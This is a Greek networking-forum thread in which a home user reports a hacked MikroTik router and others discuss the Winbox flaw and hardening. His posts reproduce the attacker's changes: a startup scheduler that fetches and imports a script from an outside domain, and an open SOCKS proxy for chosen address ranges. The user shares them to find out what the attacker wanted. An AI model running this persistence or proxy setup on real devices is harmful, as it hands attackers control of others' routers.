Καλησπέρα σας,
Καταρχάς συγχαρήτηρια στην ομάδα, ωραία δουλειά.
Τώρα... long story short... Επιστρέφω σήμερα από τη δουλειά μετά τις 4 το μεσημέρι, κάνω τη ρουτίνα μου και το απόγευμα λέω να συνδεθώ στο ΜΤ για να συνεχίσω το μικρό οικιακό μου project.Η πρώτη προσπάθεια μέσω Winbox και χρήση IP απέτυχε. Προσπαθώ μέσω browser, μπαίνω κανονικά. Περίεργο... σκέφτομαι. Προσπαθώ ξανά μέσω Winbox αλλά χρήση MAC και μπαίνω.
Στο Winbox έχω μόνιμα το log ανοιχτό. Βλέπω τα αποτυχημένα μου logins αλλά..., πιο πάνω βλέπω log entries για αλλαγές στο firewall, script που έτρεχε συνέχεια και άλλα τέτοια περίεργα. Όλα αυτά είχαν timestamp πριν τις 4 (όταν δλδ εγώ ήμουν στη δουλειά) που σημαίνει ότι κάποιος άλλος έκανε login ως admin και άλλαξε το configuration.
Ευτυχώς είχα πρόσφατο backup. Έσωσα το "μολυσμένο" configuration στο σκληρό δίσκο και επανέφερα το ΜΤ πάλι σε ορθή λειτουργία. Τέλος καλό όλα καλά θέλω να πιστεύω.
Παραθέτω παρακάτω τις αλλαγές που έκανε ο επιτιθέμενος στο configuration μπας και καταλάβουμε τι ήθελε να πετύχει, αλλά και να μάθω αν το όλο θέμα οφείλεται σε δικές μου παραλείψεις σε θέματα ασφάλειας ή σε αδυναμία του Winbox.
Επίσης μου έχει προσθέσει έναν DNS server με IP 1.1.1.1Κώδικας:/ip hotspot profile set [ find default=yes ] html-directory=flash/hotspot /ip firewall filter add action=accept chain=input dst-port=9896 protocol=tcp add action=reject chain=output dst-address=139.99.5.202 protocol=tcp add action=reject chain=output dst-address=95.154.216.166 protocol=tcp add action=accept chain=input dst-port=9896 protocol=tcp /system scheduler add disabled=yes interval=2d name=U6 on-event="/tool fetch url=http://my1story\ .xyz/poll/ce685827-b618-42bf-960e-6abcdbd750de mode=http dst-path=7wmp0b4s\ wouv\r\ \n/import 7wmp0b4swouv" policy=\ ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\ startup
Να προσθέσω ότι είχα εύκολο password (τέτοιο που σπάει με λεξικό) για τον admin user το οποίο το έχω ήδη αλλάξει.
Αυτά από εμένα... τα φώτα σας τώρα... τι λέτε να έκανε στο router μου ο επιτιθέμενος βάση αυτών που σας έχω πει μέχρι στιγμής;
Εμφάνιση 1-15 από 18
-
22-10-18, 23:15 Επίθεση σε Mikrotik router #1
-
22-10-18, 23:32 Απάντηση: Επίθεση σε Mikrotik router #2
- Εγγραφή
- 08-01-2004
- Περιοχή
- Espoo, FI
- Ηλικία
- 51
- Μηνύματα
- 20.943
- Downloads
- 41
- Uploads
- 0
- Άρθρα
- 4
- Τύπος
- FTTH
- Ταχύτητα
- 1000/400
- ISP
- Elisa
- Router
- pfsense
Υπήρξε την άνοιξη ένα κενό ασφαλείας στο Winbox:
https://blog.mikrotik.com/security/w...erability.html
https://forum.mikrotik.com/viewtopic.php?t=133533
Και τώρα είδα αυτό:
https://blog.mikrotik.com/security/n...erability.html
(δεν είναι νέο κενό ασφαλείας, απλά διαφορετικός τρόπος επίθεσης για το παραπάνω κενό)Ανυπόγραφος
-
23-10-18, 19:26 Απάντηση: Επίθεση σε Mikrotik router #3
Ευχαριστώ euri.
Έκανα το ugrade μου, έχω άλλαξει και τα passwords και από εδώ και πέρα θα δώσω μεγαλύτερη προσοχή στο κομμάτι ασφάλεια.
Δεν έχω μεγάλη εμπειρία αλλά κάτι θα καταφέρω στο τέλος.
- - - Updated - - -
Για κάποιο λόγο ξέσχασα να δώσω και κάποιες άλλες αλλαγές που μου έκανε στο configuration. Παραθέτω παρακάτω:
Κώδικας:/ip service set telnet disabled=yes set ssh port=26711 set api disabled=yes set winbox disabled=yes set api-ssl disabled=yes /ip socks set enabled=yes port=9896 /ip socks access add src-address=5.188.0.0/15 add src-address=192.243.0.0/16 add src-address=5.9.0.0/16 add src-address=5.104.0.0/16 add action=deny src-address=0.0.0.0/0 add src-address=5.188.0.0/15 add src-address=192.243.0.0/16 add src-address=5.9.0.0/16 add src-address=5.104.0.0/16 add action=deny src-address=0.0.0.0/0 add src-address=5.188.0.0/15 add src-address=192.243.0.0/16 add src-address=5.9.0.0/16 add src-address=5.104.0.0/16 add action=deny src-address=0.0.0.0/0
-
23-10-18, 19:39 Απάντηση: Επίθεση σε Mikrotik router #4
Εγω εχω τις τελευταιες μερες πολλες επιθεσεις απο Ρωσσια.
Γινεται αυτοματα μπλοκαρισμα της ΙΡ στις 5 αποτυχημενες προσταθειες σε χρονο 5 λεπτων.
Προσπαθω να βρω λυση με GEO LOCK . ακομα βεβαια ειμαι στο διαβασμα για να μαζεψω πληροφοριες.
Αλλα εχω κολλησει στο να βρω ολο το μπλοκ ΙΡ της Ελλαδος . Αν ηταν συνεχομενο θα ειχα ξεμπερδεψει.
Αλλα βλεπω υπαρχουν πολλα διασπαρτα.
Θα ηταν τελειο να καταφερω να περιορισω την προσβαση μονο σε Ελληνικες ΙΡ.The gr81 .
-
23-10-18, 22:58 Απάντηση: Επίθεση σε Mikrotik router #5
-
24-10-18, 01:35 Απάντηση: Επίθεση σε Mikrotik router #6
-
24-10-18, 06:22 Απάντηση: Επίθεση σε Mikrotik router #7
καλημέρα, @gvast δες και εδώ στο θεμα μας https://www.adslgr.com/forum/threads...-IPv6-firewall
εχουμε βαλει πολλους σχετικους κανονες.
Και πρεπει να εχεις και τελευταια ROS που εχουν κλεισει τα κενα ασφαλειας δλδ την stable, υποθετω ειχες παλια εκδοση.
Και παλι όμως θες κανονες fw rules για προστασια και αν μπορεις μην βγαζεις στο ιντερνετ υπηρεσίες του όπως πχ το winbox!
προσωπικα δεν βγαζω τπτ ότι θελω τα κανω μεσω openvpn και μονο.
Ότι βολευει τον καθενα είναι πολύ ποιο ασφαλες αντι να βγαζεις κάθε υπηρεσια του στο ιντερνετ, δλδ winbox, ftp, webfig, ssh, telnet κτλ.
Σε δικα μου με ιντερνετ εχω δει port scanners αλλα μπλοκάρονται συνεχεια και δεν εχει γινει κατι παραπανω. Exω και κανονες σχετικους με scan, brute force και για επιθεσεις σε κάθε μορφης υπηρεσια παρολο ότι δεν τις βγαζω απεξω.
ΠΑΝΤΑ βαζω την τελευταια STABLE ROS και εννοείτε δεν υπαρχει user admin.
Eνα 951 με κινητη που εχω, μολις μου το εκαναν να εχει public ip την ωρα που το εστηνα εβλεπα στα logs της ποπης από επιθεσεις!
όλα καλα μετα, μεχρι που μου την πεσανε μεσω DNS!!! και μου εφαγαν όλα τα δεδομενα μεσα σε ένα ΣΚ.
Μετα εβαλα κανονα και για το DNS και μετα κανενα πρόβλημα από τοτε.
Δες εδώ κανονες προστασιας https://www.marthur.com/networking/m...rotection/382/
και εδώ https://wiki.mikrotik.com/wiki/Manua...ng_Your_RouterΤελευταία επεξεργασία από το μέλος Nikiforos : 24-10-18 στις 06:38.
-
24-10-18, 11:35 Απάντηση: Επίθεση σε Mikrotik router #8
-
27-10-18, 10:58 Απάντηση: Επίθεση σε Mikrotik router #9
Ή απλα μπορεις να βαλεις μονο εναν κανονα για τοπικο login στο winbox του στυλ......
Κώδικας:add chain=input action=drop connection-state=new src-address-list=!Trusted winbox logins
Με αυτο το κανονα δε χρειαζεσαι τπτ αλλο, ουτε brute force ουτε port scanners............. τιποτα.
Αν και νομιζω οτι αν εχεις κανονα allow lan input-forward καθως και drop everything else input-forward παλι δε μπορει να μπει κανενας.Τελευταία επεξεργασία από το μέλος macro : 27-10-18 στις 11:17.
Άλλα Ντάλλα....
-
27-10-18, 11:55 Απάντηση: Επίθεση σε Mikrotik router #10
- Εγγραφή
- 15-11-2002
- Περιοχή
- ΠΑΤΡΑ - ΑΝΩ ΠΟΛΗ
- Ηλικία
- 48
- Μηνύματα
- 1.542
- Downloads
- 3
- Uploads
- 0
- Άρθρα
- 2
- Τύπος
- VDSL2
- ISP
- Vodafone
Αυτο που εγραψε ο nikiforos https://wiki.mikrotik.com/wiki/Manua...ng_Your_Router ειναι το καλυτερο μιας και ειναι το επισημο για τις τελευταιες επιθεσεις. Το εχω ακολουθησει βημα βημα και δεν εχω παρατηρησει το παραμικρο.
-
27-10-18, 12:23 Απάντηση: Επίθεση σε Mikrotik router #11
Εγω τα εχω κοψει ολα..... ssh telnet, τα παντα.
Άλλα Ντάλλα....
-
28-10-18, 16:18 Απάντηση: Επίθεση σε Mikrotik router #12
καλησπέρα, για port scanners καλο ειναι να εχουμε κανονα ωστε και οι ips καταγραφονται και τρωνε και block.
Κακο ΔΕΝ κανει!
και εγω τα εχω κοψει ολα και μπαινω ΜΟΝΟ μεσω OPENVPN και απο πουθενα αλλου, με καποιες εξαιρεσεις για το AWMΝ που δεν ειναι επι του παρον τοπικ και forum να αναλυσω.
Οσο περισσοτερη ασφαλεια εχουμε τοσο ποιο δυσκολο ειναι για καποιο να εισχωρησει στο μηχανημα μας.
-
04-11-18, 19:26 Απάντηση: Επίθεση σε Mikrotik router #13
οριστε και μερικες διευθυνσεις portscanning...
τον περασμενο μηνα χτυπησα ρεκορ... 5.972 μπλοκαρισμενες διεθυνσεις...
Κώδικας:Flags: X - disabled, D - dynamic # LIST ADDRESS CREATION-TIME TIMEOUT 0 D port scanners 40.112.90.122 oct/28/2018 19:17:42 1w54m57s 1 D port scanners 13.94.136.165 oct/30/2018 21:36:02 1w2d3h13m17s 2 D port scanners 137.116.234.82 nov/01/2018 16:44:56 1w5d12h48m10s 3 D port scanners 80.107.188.48 nov/01/2018 21:47:28 1w4d3h34m31s 4 D port scanners 79.166.56.185 nov/01/2018 22:13:19 1w4d9h37m42s 5 D port scanners 84.254.11.132 nov/01/2018 22:29:08 1w4d9h17m23s 6 D port scanners 85.74.146.90 nov/01/2018 23:18:26 1w4d5h27m44s 7 D port scanners 178.59.156.190 nov/02/2018 00:20:15 1w4d5h57m31s
-
04-11-18, 20:56 Απάντηση: Επίθεση σε Mikrotik router #14
- Εγγραφή
- 15-11-2002
- Περιοχή
- ΠΑΤΡΑ - ΑΝΩ ΠΟΛΗ
- Ηλικία
- 48
- Μηνύματα
- 1.542
- Downloads
- 3
- Uploads
- 0
- Άρθρα
- 2
- Τύπος
- VDSL2
- ISP
- Vodafone
Portscan απο microsoft cyta otenet και vodafone? Καμια ρωσια περιμενα και κινα..... Ειναι σιγουρα portscan αυτα?
-
04-11-18, 21:03 Απάντηση: Επίθεση σε Mikrotik router #15
ναι ... 100% ειναι P.S. Εχω ειδικα Rules για να καταγραφω την αιτουμενη πορτα και την IP που την ζητησε... ειναι ολες εξωτερικου βεβαια, καμια δεν ειναι απο ελλαδα...
Παρόμοια Θέματα
-
Τρόποι για internet κινητής σε Mikrotik Routerboard
Από Nikiforos στο φόρουμ MikroTik ADSL modems, routers & routerBOARDsΜηνύματα: 661Τελευταίο Μήνυμα: 20-02-24, 18:29 -
Επίθεση σε τράπεζα στην Ινδία από hackers, σηκώσανε 13,4 εκατομμύρια δολάρια
Από sdikr στο φόρουμ ΕιδήσειςΜηνύματα: 26Τελευταίο Μήνυμα: 19-08-18, 14:29 -
Εξελιγμένο malware στοχεύει MikroTik routers για να μολύνει τα θύματα του
Από nnn στο φόρουμ ΕιδήσειςΜηνύματα: 25Τελευταίο Μήνυμα: 14-03-18, 18:05 -
Isolated Hotspot με Mikrotik router
Από petran στο φόρουμ MikroTik ADSL modems, routers & routerBOARDsΜηνύματα: 0Τελευταίο Μήνυμα: 11-11-17, 17:51 -
Αδυναμία απομακρυσμένης σύνδεσης σε MikroTik L2TP/IPSec server
Από Cuore Sportivo στο φόρουμ MikroTik ADSL modems, routers & routerBOARDsΜηνύματα: 20Τελευταίο Μήνυμα: 09-11-17, 17:37
Bookmarks